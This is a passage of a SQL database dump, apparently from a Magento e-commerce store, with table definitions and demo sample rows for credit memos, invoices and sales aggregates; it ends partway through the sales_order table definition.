  `is_customer_notified` int(11) DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `comment` text DEFAULT NULL COMMENT 'Comment',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Creditmemo Comment';

-- --------------------------------------------------------

--
-- Table structure for table `sales_creditmemo_grid`
--

CREATE TABLE `sales_creditmemo_grid` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `order_increment_id` varchar(50) DEFAULT NULL COMMENT 'Order Increment ID',
  `order_created_at` timestamp NULL DEFAULT NULL COMMENT 'Order Created At',
  `billing_name` varchar(255) DEFAULT NULL COMMENT 'Billing Name',
  `state` int(11) DEFAULT NULL COMMENT 'Status',
  `base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Grand Total',
  `order_status` varchar(32) DEFAULT NULL COMMENT 'Order Status',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `billing_address` varchar(255) DEFAULT NULL COMMENT 'Billing Address',
  `shipping_address` varchar(255) DEFAULT NULL COMMENT 'Shipping Address',
  `customer_name` varchar(128) NOT NULL COMMENT 'Customer Name',
  `customer_email` varchar(128) DEFAULT NULL COMMENT 'Customer Email',
  `customer_group_id` smallint(6) DEFAULT NULL COMMENT 'Customer Group ID',
  `payment_method` varchar(32) DEFAULT NULL COMMENT 'Payment Method',
  `shipping_information` varchar(255) DEFAULT NULL COMMENT 'Shipping Method Name',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `shipping_and_handling` decimal(20,4) DEFAULT NULL COMMENT 'Shipping and handling amount',
  `adjustment_positive` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment Positive',
  `adjustment_negative` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment Negative',
  `order_base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Order Grand Total'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Creditmemo Grid';

--
-- Dumping data for table `sales_creditmemo_grid`
--

INSERT INTO `sales_creditmemo_grid` (`entity_id`, `increment_id`, `created_at`, `updated_at`, `order_id`, `order_increment_id`, `order_created_at`, `billing_name`, `state`, `base_grand_total`, `order_status`, `store_id`, `billing_address`, `shipping_address`, `customer_name`, `customer_email`, `customer_group_id`, `payment_method`, `shipping_information`, `subtotal`, `shipping_and_handling`, `adjustment_positive`, `adjustment_negative`, `order_base_grand_total`) VALUES
(1, '000000001', '2020-08-08 01:45:27', '2020-08-08 01:45:27', 2, '000000002', '2020-08-08 01:45:23', 'Veronica Costello', 2, 39.6400, 'closed', 1, '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Veronica Costello', 'roni_cost@example.com', 1, 'checkmo', 'Flat Rate - Fixed', 32.0000, 5.0000, NULL, NULL, 39.6400);

-- --------------------------------------------------------

--
-- Table structure for table `sales_creditmemo_item`
--

CREATE TABLE `sales_creditmemo_item` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `base_price` decimal(12,4) DEFAULT NULL COMMENT 'Base Price',
  `tax_amount` decimal(12,4) DEFAULT NULL COMMENT 'Tax Amount',
  `base_row_total` decimal(12,4) DEFAULT NULL COMMENT 'Base Row Total',
  `discount_amount` decimal(12,4) DEFAULT NULL COMMENT 'Discount Amount',
  `row_total` decimal(12,4) DEFAULT NULL COMMENT 'Row Total',
  `base_discount_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Discount Amount',
  `price_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Price Incl Tax',
  `base_tax_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Tax Amount',
  `base_price_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Base Price Incl Tax',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `base_cost` decimal(12,4) DEFAULT NULL COMMENT 'Base Cost',
  `price` decimal(12,4) DEFAULT NULL COMMENT 'Price',
  `base_row_total_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Base Row Total Incl Tax',
  `row_total_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Row Total Incl Tax',
  `product_id` int(11) DEFAULT NULL COMMENT 'Product ID',
  `order_item_id` int(11) DEFAULT NULL COMMENT 'Order Item ID',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `description` text DEFAULT NULL COMMENT 'Description',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `discount_tax_compensation_amount` decimal(12,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `tax_ratio` text DEFAULT NULL COMMENT 'Ratio of tax in the creditmemo item over tax of the order item',
  `weee_tax_applied` text DEFAULT NULL COMMENT 'Weee Tax Applied',
  `weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Amount',
  `weee_tax_applied_row_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Row Amount',
  `weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Disposition',
  `weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Row Disposition',
  `base_weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Amount',
  `base_weee_tax_applied_row_amnt` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Row Amnt',
  `base_weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Disposition',
  `base_weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Row Disposition'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Creditmemo Item';

--
-- Dumping data for table `sales_creditmemo_item`
--

INSERT INTO `sales_creditmemo_item` (`entity_id`, `parent_id`, `base_price`, `tax_amount`, `base_row_total`, `discount_amount`, `row_total`, `base_discount_amount`, `price_incl_tax`, `base_tax_amount`, `base_price_incl_tax`, `qty`, `base_cost`, `price`, `base_row_total_incl_tax`, `row_total_incl_tax`, `product_id`, `order_item_id`, `additional_data`, `description`, `sku`, `name`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `tax_ratio`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(1, 1, 32.0000, 2.6400, 32.0000, NULL, 32.0000, NULL, 34.6400, 2.6400, 34.6400, 1.0000, NULL, 32.0000, 34.6400, 34.6400, 1505, 2, NULL, NULL, 'WS08-XS-Blue', 'Minerva LumaTech&trade; V-Tee', 0.0000, 0.0000, NULL, '[]', NULL, 0.0000, NULL, 0.0000, NULL, NULL, NULL, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_invoice`
--

CREATE TABLE `sales_invoice` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Grand Total',
  `shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Tax Amount',
  `tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Tax Amount',
  `base_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Amount',
  `store_to_order_rate` decimal(20,4) DEFAULT NULL COMMENT 'Store To Order Rate',
  `base_shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Tax Amount',
  `base_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Amount',
  `base_to_order_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Order Rate',
  `grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Grand Total',
  `shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Amount',
  `subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Incl Tax',
  `base_subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Incl Tax',
  `store_to_base_rate` decimal(20,4) DEFAULT NULL COMMENT 'Store To Base Rate',
  `base_shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Amount',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `base_to_global_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Global Rate',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `base_subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal',
  `discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Amount',
  `billing_address_id` int(11) DEFAULT NULL COMMENT 'Billing Address ID',
  `is_used_for_refund` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Used For Refund',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `email_sent` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Email Sent',
  `send_email` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Send Email',
  `can_void_flag` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Can Void Flag',
  `state` int(11) DEFAULT NULL COMMENT 'State',
  `shipping_address_id` int(11) DEFAULT NULL COMMENT 'Shipping Address ID',
  `store_currency_code` varchar(3) DEFAULT NULL COMMENT 'Store Currency Code',
  `transaction_id` varchar(255) DEFAULT NULL COMMENT 'Transaction ID',
  `order_currency_code` varchar(3) DEFAULT NULL COMMENT 'Order Currency Code',
  `base_currency_code` varchar(3) DEFAULT NULL COMMENT 'Base Currency Code',
  `global_currency_code` varchar(3) DEFAULT NULL COMMENT 'Global Currency Code',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `shipping_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Discount Tax Compensation Amount',
  `base_shipping_discount_tax_compensation_amnt` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Discount Tax Compensation Amount',
  `shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Incl Tax',
  `base_shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Incl Tax',
  `base_total_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Refunded',
  `discount_description` varchar(255) DEFAULT NULL COMMENT 'Discount Description',
  `customer_note` text DEFAULT NULL COMMENT 'Customer Note',
  `customer_note_notify` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Customer Note Notify'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Invoice';

--
-- Dumping data for table `sales_invoice`
--

INSERT INTO `sales_invoice` (`entity_id`, `store_id`, `base_grand_total`, `shipping_tax_amount`, `tax_amount`, `base_tax_amount`, `store_to_order_rate`, `base_shipping_tax_amount`, `base_discount_amount`, `base_to_order_rate`, `grand_total`, `shipping_amount`, `subtotal_incl_tax`, `base_subtotal_incl_tax`, `store_to_base_rate`, `base_shipping_amount`, `total_qty`, `base_to_global_rate`, `subtotal`, `base_subtotal`, `discount_amount`, `billing_address_id`, `is_used_for_refund`, `order_id`, `email_sent`, `send_email`, `can_void_flag`, `state`, `shipping_address_id`, `store_currency_code`, `transaction_id`, `order_currency_code`, `base_currency_code`, `global_currency_code`, `increment_id`, `created_at`, `updated_at`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `base_total_refunded`, `discount_description`, `customer_note`, `customer_note_notify`) VALUES
(1, 1, 36.3900, 0.0000, 2.3900, 2.3900, 0.0000, 0.0000, 0.0000, 1.0000, 36.3900, 5.0000, 31.3900, 31.3900, 0.0000, 5.0000, 1.0000, 1.0000, 29.0000, 29.0000, 0.0000, 2, NULL, 1, NULL, NULL, 0, 2, 1, 'BDT', NULL, 'BDT', 'BDT', 'BDT', '000000001', '2020-08-08 01:45:19', '2020-08-08 01:45:19', 0.0000, 0.0000, 0.0000, 0.0000, 5.0000, 5.0000, NULL, NULL, NULL, NULL),
(2, 1, 39.6400, 0.0000, 2.6400, 2.6400, 0.0000, 0.0000, 0.0000, 1.0000, 39.6400, 5.0000, 34.6400, 34.6400, 0.0000, 5.0000, 1.0000, 1.0000, 32.0000, 32.0000, 0.0000, 4, NULL, 2, NULL, NULL, 0, 2, 3, 'BDT', NULL, 'BDT', 'BDT', 'BDT', '000000002', '2020-08-08 01:45:25', '2020-08-08 01:45:25', 0.0000, 0.0000, 0.0000, 0.0000, 5.0000, 5.0000, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `sales_invoiced_aggregated`
--

CREATE TABLE `sales_invoiced_aggregated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `orders_invoiced` decimal(12,4) DEFAULT NULL COMMENT 'Orders Invoiced',
  `invoiced` decimal(12,4) DEFAULT NULL COMMENT 'Invoiced',
  `invoiced_captured` decimal(12,4) DEFAULT NULL COMMENT 'Invoiced Captured',
  `invoiced_not_captured` decimal(12,4) DEFAULT NULL COMMENT 'Invoiced Not Captured'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Invoiced Aggregated';

--
-- Dumping data for table `sales_invoiced_aggregated`
--

INSERT INTO `sales_invoiced_aggregated` (`id`, `period`, `store_id`, `order_status`, `orders_count`, `orders_invoiced`, `invoiced`, `invoiced_captured`, `invoiced_not_captured`) VALUES
(1, '2020-08-08', 1, 'closed', 1, 1.0000, 39.6400, 39.6400, 0.0000),
(2, '2020-08-08', 1, 'processing', 1, 1.0000, 36.3900, 36.3900, 0.0000),
(4, '2020-08-08', 0, 'closed', 1, 1.0000, 39.6400, 39.6400, 0.0000),
(5, '2020-08-08', 0, 'processing', 1, 1.0000, 36.3900, 36.3900, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_invoiced_aggregated_order`
--

CREATE TABLE `sales_invoiced_aggregated_order` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `orders_invoiced` decimal(12,4) DEFAULT NULL COMMENT 'Orders Invoiced',
  `invoiced` decimal(12,4) DEFAULT NULL COMMENT 'Invoiced',
  `invoiced_captured` decimal(12,4) DEFAULT NULL COMMENT 'Invoiced Captured',
  `invoiced_not_captured` decimal(12,4) DEFAULT NULL COMMENT 'Invoiced Not Captured'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Invoiced Aggregated Order';

--
-- Dumping data for table `sales_invoiced_aggregated_order`
--

INSERT INTO `sales_invoiced_aggregated_order` (`id`, `period`, `store_id`, `order_status`, `orders_count`, `orders_invoiced`, `invoiced`, `invoiced_captured`, `invoiced_not_captured`) VALUES
(1, '2020-08-08', 1, 'closed', 1, 1.0000, 39.6400, 39.6400, 0.0000),
(2, '2020-08-08', 1, 'processing', 1, 1.0000, 36.3900, 36.3900, 0.0000),
(4, '2020-08-08', 0, 'closed', 1, 1.0000, 39.6400, 39.6400, 0.0000),
(5, '2020-08-08', 0, 'processing', 1, 1.0000, 36.3900, 36.3900, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_invoice_comment`
--

CREATE TABLE `sales_invoice_comment` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `is_customer_notified` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `comment` text DEFAULT NULL COMMENT 'Comment',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Invoice Comment';

-- --------------------------------------------------------

--
-- Table structure for table `sales_invoice_grid`
--

CREATE TABLE `sales_invoice_grid` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `state` int(11) DEFAULT NULL COMMENT 'State',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `store_name` varchar(255) DEFAULT NULL COMMENT 'Store Name',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `order_increment_id` varchar(50) DEFAULT NULL COMMENT 'Order Increment ID',
  `order_created_at` timestamp NULL DEFAULT NULL COMMENT 'Order Created At',
  `customer_name` varchar(255) DEFAULT NULL COMMENT 'Customer Name',
  `customer_email` varchar(255) DEFAULT NULL COMMENT 'Customer Email',
  `customer_group_id` int(11) DEFAULT NULL,
  `payment_method` varchar(128) DEFAULT NULL COMMENT 'Payment Method',
  `store_currency_code` varchar(3) DEFAULT NULL COMMENT 'Store Currency Code',
  `order_currency_code` varchar(3) DEFAULT NULL COMMENT 'Order Currency Code',
  `base_currency_code` varchar(3) DEFAULT NULL COMMENT 'Base Currency Code',
  `global_currency_code` varchar(3) DEFAULT NULL COMMENT 'Global Currency Code',
  `billing_name` varchar(255) DEFAULT NULL COMMENT 'Billing Name',
  `billing_address` varchar(255) DEFAULT NULL COMMENT 'Billing Address',
  `shipping_address` varchar(255) DEFAULT NULL COMMENT 'Shipping Address',
  `shipping_information` varchar(255) DEFAULT NULL COMMENT 'Shipping Method Name',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `shipping_and_handling` decimal(20,4) DEFAULT NULL COMMENT 'Shipping and handling amount',
  `grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Grand Total',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At',
  `base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Grand Total'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Invoice Grid';

--
-- Dumping data for table `sales_invoice_grid`
--

INSERT INTO `sales_invoice_grid` (`entity_id`, `increment_id`, `state`, `store_id`, `store_name`, `order_id`, `order_increment_id`, `order_created_at`, `customer_name`, `customer_email`, `customer_group_id`, `payment_method`, `store_currency_code`, `order_currency_code`, `base_currency_code`, `global_currency_code`, `billing_name`, `billing_address`, `shipping_address`, `shipping_information`, `subtotal`, `shipping_and_handling`, `grand_total`, `created_at`, `updated_at`, `base_grand_total`) VALUES
(1, '000000001', 2, 1, 'Main Website\nMain Website Store\nDefault Store View', 1, '000000001', '2020-08-08 01:45:18', 'Veronica Costello', 'roni_cost@example.com', 1, 'checkmo', 'BDT', 'BDT', 'BDT', 'BDT', 'Veronica Costello', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Flat Rate - Fixed', 29.0000, 5.0000, 36.3900, '2020-08-08 01:45:19', '2020-08-08 01:45:19', 36.3900),
(2, '000000002', 2, 1, 'Main Website\nMain Website Store\nDefault Store View', 2, '000000002', '2020-08-08 01:45:23', 'Veronica Costello', 'roni_cost@example.com', 1, 'checkmo', 'BDT', 'BDT', 'BDT', 'BDT', 'Veronica Costello', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Flat Rate - Fixed', 32.0000, 5.0000, 39.6400, '2020-08-08 01:45:25', '2020-08-08 01:45:25', 39.6400);

-- --------------------------------------------------------

--
-- Table structure for table `sales_invoice_item`
--

CREATE TABLE `sales_invoice_item` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `base_price` decimal(12,4) DEFAULT NULL COMMENT 'Base Price',
  `tax_amount` decimal(12,4) DEFAULT NULL COMMENT 'Tax Amount',
  `base_row_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Row Total',
  `discount_amount` decimal(12,4) DEFAULT NULL COMMENT 'Discount Amount',
  `row_total` decimal(20,4) DEFAULT NULL COMMENT 'Row Total',
  `base_discount_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Discount Amount',
  `price_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Price Incl Tax',
  `base_tax_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Tax Amount',
  `base_price_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Base Price Incl Tax',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `base_cost` decimal(12,4) DEFAULT NULL COMMENT 'Base Cost',
  `price` decimal(12,4) DEFAULT NULL COMMENT 'Price',
  `base_row_total_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Base Row Total Incl Tax',
  `row_total_incl_tax` decimal(12,4) DEFAULT NULL COMMENT 'Row Total Incl Tax',
  `product_id` int(11) DEFAULT NULL COMMENT 'Product ID',
  `order_item_id` int(11) DEFAULT NULL COMMENT 'Order Item ID',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `description` text DEFAULT NULL COMMENT 'Description',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `discount_tax_compensation_amount` decimal(12,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `tax_ratio` text DEFAULT NULL COMMENT 'Ratio of tax invoiced over tax of the order item',
  `weee_tax_applied` text DEFAULT NULL COMMENT 'Weee Tax Applied',
  `weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Amount',
  `weee_tax_applied_row_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Row Amount',
  `weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Disposition',
  `weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Row Disposition',
  `base_weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Amount',
  `base_weee_tax_applied_row_amnt` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Row Amnt',
  `base_weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Disposition',
  `base_weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Row Disposition'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Invoice Item';

--
-- Dumping data for table `sales_invoice_item`
--

INSERT INTO `sales_invoice_item` (`entity_id`, `parent_id`, `base_price`, `tax_amount`, `base_row_total`, `discount_amount`, `row_total`, `base_discount_amount`, `price_incl_tax`, `base_tax_amount`, `base_price_incl_tax`, `qty`, `base_cost`, `price`, `base_row_total_incl_tax`, `row_total_incl_tax`, `product_id`, `order_item_id`, `additional_data`, `description`, `sku`, `name`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `tax_ratio`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(1, 1, 29.0000, 2.3900, 29.0000, NULL, 29.0000, NULL, 31.3900, 2.3900, 31.3900, 1.0000, NULL, 29.0000, 31.3900, 31.3900, 1441, 1, NULL, NULL, 'WS03-XS-Red', 'Iris Workout Top', 0.0000, 0.0000, NULL, '[]', NULL, 0.0000, NULL, 0.0000, NULL, NULL, NULL, 0.0000),
(2, 2, 32.0000, 2.6400, 32.0000, NULL, 32.0000, NULL, 34.6400, 2.6400, 34.6400, 1.0000, NULL, 32.0000, 34.6400, 34.6400, 1505, 2, NULL, NULL, 'WS08-XS-Blue', 'Minerva LumaTech&trade; V-Tee', 0.0000, 0.0000, NULL, '[]', NULL, 0.0000, NULL, 0.0000, NULL, NULL, NULL, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order`
--

CREATE TABLE `sales_order` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `state` varchar(32) DEFAULT NULL COMMENT 'State',
  `status` varchar(32) DEFAULT NULL COMMENT 'Status',
  `coupon_code` varchar(255) DEFAULT NULL COMMENT 'Coupon Code',
  `protect_code` varchar(255) DEFAULT NULL COMMENT 'Protect Code',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `is_virtual` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Virtual',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `base_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Amount',
  `base_discount_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Canceled',
  `base_discount_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Invoiced',
  `base_discount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Refunded',
  `base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Grand Total',
  `base_shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Amount',
  `base_shipping_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Canceled',
  `base_shipping_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Invoiced',
  `base_shipping_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Refunded',
  `base_shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Tax Amount',
  `base_shipping_tax_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Tax Refunded',
  `base_subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal',
  `base_subtotal_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Canceled',
  `base_subtotal_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Invoiced',
  `base_subtotal_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Refunded',
  `base_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Amount',
  `base_tax_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Canceled',
  `base_tax_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Invoiced',
  `base_tax_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Refunded',
  `base_to_global_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Global Rate',
  `base_to_order_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Order Rate',
  `base_total_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Canceled',
  `base_total_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Invoiced',
  `base_total_invoiced_cost` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Invoiced Cost',
  `base_total_offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Offline Refunded',
  `base_total_online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Online Refunded',
  `base_total_paid` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Paid',
  `base_total_qty_ordered` decimal(12,4) DEFAULT NULL COMMENT 'Base Total Qty Ordered',
  `base_total_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Refunded',
  `discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Amount',
  `discount_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Discount Canceled',
